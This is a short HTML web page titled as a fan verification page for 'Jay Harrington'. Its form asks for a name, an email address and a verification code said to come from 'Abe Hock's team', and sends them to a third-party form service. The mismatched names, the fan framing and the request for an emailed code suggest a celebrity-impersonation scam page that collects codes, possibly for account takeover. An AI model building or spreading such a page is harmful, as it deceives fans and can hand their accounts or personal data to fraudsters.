
<!DOCTYPE html>
<html>
<head>
  <title>Fan Code Verification – Jay Harrington</title>
</head>
<body>
  <h2>Enter Your Fan Verification Code</h2>
  <p>If you received an official verification code by email from Abe Hock's team, please enter it below to complete your access.</p>

  <form action="https://formspree.io/f/n3jkd84m" method="POST">
    <label>Your Name:</label><br>
    <input type="text" name="name" required><br><br>

    <label>Email Address:</label><br>
    <input type="email" name="email" required><br><br>

    <label>Verification Code:</label><br>
    <input type="text" name="code" placeholder="Enter your code here" required><br><br>

    <label>Optional Message to Jay:</label><br>
    <textarea name="message" rows="4"></textarea><br><br>

    <button type="submit">Submit Code & Confirm Access</button>
  </form>
</body>
</html>
